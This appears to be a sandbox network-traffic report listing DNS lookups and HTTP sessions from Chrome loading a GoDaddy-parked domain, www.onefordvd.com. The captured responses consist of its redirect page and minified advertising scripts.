Aug 29, 2024 17:12:18.066381931 CEST | 1.1.1.1 | 192.168.2.5 | 0x2bef | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:18.066971064 CEST | 1.1.1.1 | 192.168.2.5 | 0xdbfd | No error (0) | www.google.com | | 142.250.186.68 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.372340918 CEST | 1.1.1.1 | 192.168.2.5 | 0x6d4c | No error (0) | www.google.com | | 216.58.206.68 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.372389078 CEST | 1.1.1.1 | 192.168.2.5 | 0x21b4 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:19.295773983 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f10 | No error (0) | api.aws.parking.godaddy.com | gddomainparking.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:19.295773983 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f10 | No error (0) | gddomainparking.com | | 54.174.215.77 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:19.295773983 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f10 | No error (0) | gddomainparking.com | | 35.170.142.141 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:19.295789003 CEST | 1.1.1.1 | 192.168.2.5 | 0xf57f | No error (0) | api.aws.parking.godaddy.com | gddomainparking.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:20.463551044 CEST | 1.1.1.1 | 192.168.2.5 | 0xc22b | No error (0) | ad-delivery.net | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.464247942 CEST | 1.1.1.1 | 192.168.2.5 | 0xf53b | No error (0) | ad-delivery.net | | 104.26.2.70 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.464247942 CEST | 1.1.1.1 | 192.168.2.5 | 0xf53b | No error (0) | ad-delivery.net | | 104.26.3.70 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.464247942 CEST | 1.1.1.1 | 192.168.2.5 | 0xf53b | No error (0) | ad-delivery.net | | 172.67.69.19 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.466523886 CEST | 1.1.1.1 | 192.168.2.5 | 0x1fac | No error (0) | ad.doubleclick.net | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.466562986 CEST | 1.1.1.1 | 192.168.2.5 | 0x7de3 | No error (0) | ad.doubleclick.net | | 142.250.186.166 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.490946054 CEST | 1.1.1.1 | 192.168.2.5 | 0x42b8 | No error (0) | img1.wsimg.com | global-wildcard.wsimg.com.sni-only.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:20.506532907 CEST | 1.1.1.1 | 192.168.2.5 | 0x241e | No error (0) | img1.wsimg.com | global-wildcard.wsimg.com.sni-only.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:20.903687000 CEST | 1.1.1.1 | 192.168.2.5 | 0x2ae7 | No error (0) | syndicatedsearch.goog | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:21.143326998 CEST | 1.1.1.1 | 192.168.2.5 | 0xbf99 | No error (0) | api.aws.parking.godaddy.com | gddomainparking.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:21.152234077 CEST | 1.1.1.1 | 192.168.2.5 | 0x733d | No error (0) | api.aws.parking.godaddy.com | gddomainparking.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:21.152234077 CEST | 1.1.1.1 | 192.168.2.5 | 0x733d | No error (0) | gddomainparking.com | | 54.174.215.77 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:21.152234077 CEST | 1.1.1.1 | 192.168.2.5 | 0x733d | No error (0) | gddomainparking.com | | 35.170.142.141 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:22.619158030 CEST | 1.1.1.1 | 192.168.2.5 | 0x495a | No error (0) | afs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:22.619158030 CEST | 1.1.1.1 | 192.168.2.5 | 0x495a | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.186.161 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:22.619266033 CEST | 1.1.1.1 | 192.168.2.5 | 0xd20d | No error (0) | afs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:23.908694983 CEST | 1.1.1.1 | 192.168.2.5 | 0xf92f | No error (0) | syndicatedsearch.goog | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:24.073435068 CEST | 1.1.1.1 | 192.168.2.5 | 0xc2a2 | No error (0) | www.google.com | | 216.58.206.68 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:24.074997902 CEST | 1.1.1.1 | 192.168.2.5 | 0xf54f | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:26.026874065 CEST | 1.1.1.1 | 192.168.2.5 | 0x2224 | No error (0) | afs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:26.026874065 CEST | 1.1.1.1 | 192.168.2.5 | 0x2224 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.184.193 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:26.027375937 CEST | 1.1.1.1 | 192.168.2.5 | 0x503d | No error (0) | afs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:28.404875994 CEST | 1.1.1.1 | 192.168.2.5 | 0x699a | Name error (3) | 1861119.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:28.787944078 CEST | 1.1.1.1 | 192.168.2.5 | 0xaad5 | Name error (3) | msg.tmhacker.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:29.675889015 CEST | 1.1.1.1 | 192.168.2.5 | 0x8c74 | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:29.839440107 CEST | 1.1.1.1 | 192.168.2.5 | 0xe3e7 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:29.857098103 CEST | 1.1.1.1 | 192.168.2.5 | 0xa928 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.208724976 CEST | 1.1.1.1 | 192.168.2.5 | 0xb269 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.208878040 CEST | 1.1.1.1 | 192.168.2.5 | 0x2b9f | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:30.617733955 CEST | 1.1.1.1 | 192.168.2.5 | 0xe32e | No error (0) | google.com | | 142.250.186.110 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.617774963 CEST | 8.8.8.8 | 192.168.2.5 | 0x4aad | No error (0) | google.com | | 142.251.37.14 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:31.590953112 CEST | 1.1.1.1 | 192.168.2.5 | 0x35b6 | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:31.593971968 CEST | 1.1.1.1 | 192.168.2.5 | 0xb4be | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:36.665052891 CEST | 1.1.1.1 | 192.168.2.5 | 0xecde | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:36.690865040 CEST | 1.1.1.1 | 192.168.2.5 | 0x114b | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:36.796798944 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d8 | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:13:06.053914070 CEST | 1.1.1.1 | 192.168.2.5 | 0x31f7 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:07.172674894 CEST | 1.1.1.1 | 192.168.2.5 | 0x6274 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:07.245523930 CEST | 1.1.1.1 | 192.168.2.5 | 0xf7f0 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:07.307838917 CEST | 1.1.1.1 | 192.168.2.5 | 0x3c4f | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:13:26.726206064 CEST | 1.1.1.1 | 192.168.2.5 | 0xe02 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:14:07.277966976 CEST | 1.1.1.1 | 192.168.2.5 | 0x1983 | Name error (3) | www.dvdforone.com | none | none | 65 | IN (0x0001) | false
Aug 29, 2024 17:14:07.278088093 CEST | 1.1.1.1 | 192.168.2.5 | 0xea09 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:14:07.309833050 CEST | 1.1.1.1 | 192.168.2.5 | 0xc977 | Name error (3) | www.dvdforone.com | none | none | A (IP address) | IN (0x0001) | false
• www.onefordvd.com
• https:
  • btloader.com
  • www.google.com
  • ad-delivery.net
  • ad.doubleclick.net
  • api.aws.parking.godaddy.com
  • syndicatedsearch.goog
  • afs.googleusercontent.com
  • www.bing.com
• fs.microsoft.com
• slscr.update.microsoft.com
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.54970715.197.204.56804040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Aug 29, 2024 17:12:14.266983986 CEST432OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:14.749639034 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:12:14.805321932 CEST474OUTGET /lander HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Referer: http://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:14.922194958 CEST285INHTTP/1.1 301 Moved Permanently
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 67
                                                                          Connection: keep-alive
                                                                          Location: https://www.onefordvd.com/lander
                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 2f 6c 61 6e 64 65 72 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="https://www.onefordvd.com/lander">Moved Permanently</a>.
                                                                          Aug 29, 2024 17:12:14.939589024 CEST494OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Referer: http://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:15.045474052 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:12:18.415252924 CEST531OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: expiry_partner=; caf_ipaddr=8.46.123.33; country=US; city=New%20York; lander_type=parking
                                                                          Aug 29, 2024 17:12:18.520024061 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:13:03.526462078 CEST6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54970815.197.204.56804040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Aug 29, 2024 17:12:59.275988102 CEST6OUTData Raw: 00
                                                                          Data Ascii:


Session ID: 0
Source IP: 192.168.2.5
Source Port: 49712
Destination IP: 15.197.204.56
Destination Port: 443
PID: 4040
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp: 2024-08-29 15:12:15 UTC, Bytes transferred: 688, Direction: OUT
GET /lander HTTP/1.1
Host: www.onefordvd.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: http://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Timestamp: 2024-08-29 15:12:15 UTC, Bytes transferred: 708, Direction: IN
HTTP/1.1 200 OK
Cache-Control: private, max-age=86400
Content-Type: text/html
Date: Thu, 29 Aug 2024 15:12:15 GMT
Server: openresty
Set-Cookie: expiry_partner=; Path=/; Max-Age=86400
Set-Cookie: caf_ipaddr=8.46.123.33; Path=/; Max-Age=86400
Set-Cookie: country=US; Path=/; Max-Age=86400
Set-Cookie: city=New%20York; Path=/; Max-Age=86400
Set-Cookie: lander_type=parking; Path=/; Max-Age=86400
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FyGotyW0cZLGGa4j4IB7tAwNAvGOAB+crxhyTip6ZxtQAY6DNNIMZuWdgtTLOfD8TH3eL59kXiXe/Xx2JUqkKw
X-Content-Type-Options: nosniff
Content-Length: 620
Connection: close
Timestamp: 2024-08-29 15:12:15 UTC, Bytes transferred: 478, Direction: IN
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script s
Timestamp: 2024-08-29 15:12:15 UTC, Bytes transferred: 142, Direction: IN
Data Ascii: k href="https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css" rel="stylesheet"></head><body><div id="root"></div></body></html>


Session ID: 1
Source IP: 192.168.2.5
Source Port: 53744
Destination IP: 172.67.41.60
Destination Port: 443
PID: 4040
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp: 2024-08-29 15:12:16 UTC, Bytes transferred: 546, Direction: OUT
GET /tag?o=5097926782615552&upapi=true HTTP/1.1
Host: btloader.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Timestamp: 2024-08-29 15:12:16 UTC, Bytes transferred: 444, Direction: IN
HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:16 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: close
Cache-Control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
Etag: W/"797aa17e982f10a873a7f98bd2d4edb9"
Last-Modified: Thu, 29 Aug 2024 15:09:35 GMT
Vary: Origin
Via: 1.1 google
CF-Cache-Status: HIT
Age: 8
Server: cloudflare
CF-RAY: 8bad7a760aa9c341-EWR
                                                                          2024-08-29 15:12:16 UTC925INData Raw: 37 64 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 73 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 73 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 72 29 26 26 28 65 5b 72 5d 3d 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65
                                                                          Data Ascii: 7de4!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 7c 28 28 72 3d 73 2e 72 65 74 75 72 6e 29 26 26 72 2e 63 61 6c 6c 28 73 29 2c 30 29 3a 73 2e 6e 65 78 74 29 26 26 21 28 72 3d 72 2e 63 61 6c 6c 28 73 2c 69 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 72 3b 73 77 69 74 63 68 28 73 3d 30 2c 72 26 26 28 69 3d 5b 32 26 69 5b 30 5d 2c 72 2e 76 61 6c 75 65 5d 29 2c 69 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 72 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 69 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 6f 2e 6c 61 62 65 6c 2b 2b 2c 73 3d 69 5b 31 5d 2c 69 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 69 3d 6f 2e 6f 70 73 2e 70 6f 70 28 29 2c 6f 2e 74 72 79 73 2e 70 6f 70 28 29 3b
                                                                          Data Ascii: |((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=0,r&&(i=[2&i[0],r.value]),i[0]){case 0:case 1:r=i;break;case 4:return o.label++,{value:i[1],done:!1};case 5:o.label++,s=i[1],i=[0];continue;case 7:i=o.ops.pop(),o.trys.pop();
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 69 2c 61 2c 63 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 74 72 79 73 2e 70 75 73 68 28 5b 30 2c 33 2c 2c 34 5d 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 3d 77 69 6e 64 6f 77 2e 5f 5f 62 74 7c 7c 7b 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 3f 5b 33 2c 32 5d 3a 5b 34 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 28 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 5b 32 2c 6e 2e 73 65 6e 74 28
                                                                          Data Ascii: d 0,(function(){var e,t,i,a,c;return n(this,(function(n){switch(n.label){case 0:return n.trys.push([0,3,,4]),window.__bt=window.__bt||{},"function"!=typeof window.__bt.customDetectAdBlock?[3,2]:[4,window.__bt.customDetectAdBlock()];case 1:return[2,n.sent(
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 76 61 72 20 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 3b 74 72 79 7b 69 66 28 74 6f 70 2e 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 74 6f 70 7d 63 61 74 63 68 28 65 29 7b 7d 74 72 79 7b 66 6f 72 28 3b 65 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 3b 29 65 3d 65 2e 70 61 72 65 6e 74 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 65 7d 28 29 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 22 22 21 3d 3d 64 6f 63
                                                                          Data Ascii: ))}function l(e){(window.document.body||window.document.documentElement).removeChild(e)}var u=function(){var e=window;try{if(top.document)return top}catch(e){}try{for(;e.parent.document;)e=e.parent}catch(e){}return e}();var d=function(){try{return""!==doc
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 22 22 2c 20 22 76 69 65 77 22 3a 22 22 2c 20 22 73 69 6e 67 6c 65 5f 63 6c 69 63 6b 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 70 61 67 65 5f 76 69 65 77 73 5f 74 6f 5f 72 65 6e 64 65 72 22 3a 22 30 22 2c 20 22 70 72 65 6d 69 75 6d 5f 62 79 70 61 73 73 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 68 61 72 64 5f 6d 65 73 73 61 67 65 5f 77 61 6c 6c 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 61 6c 6c 6f 77 5f 72 65 6e 64 65 72 5f 74 6f 5f 61 61 5f 75 73 65 72 73 22 3a 66 61 6c 73 65 2c 20 22 63 74 61 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 22 3a 22 22 2c 20 22 66 6f 6e 74 5f 74 79 70 65 22 3a 22 22 2c 20 22 72 65 6e 64 65 72 5f 69 6e 74 65 72 76 61 6c 5f 64 61 79 73 22 3a 30 2c 20 22 63 6f 75 6e 74
                                                                          Data Ascii: "", "view":"", "single_click_enabled":false, "page_views_to_render":"0", "premium_bypass_mode_enabled":false, "hard_message_wall_mode_enabled":false, "allow_render_to_aa_users":false, "cta_button_color":"", "font_type":"", "render_interval_days":0, "count
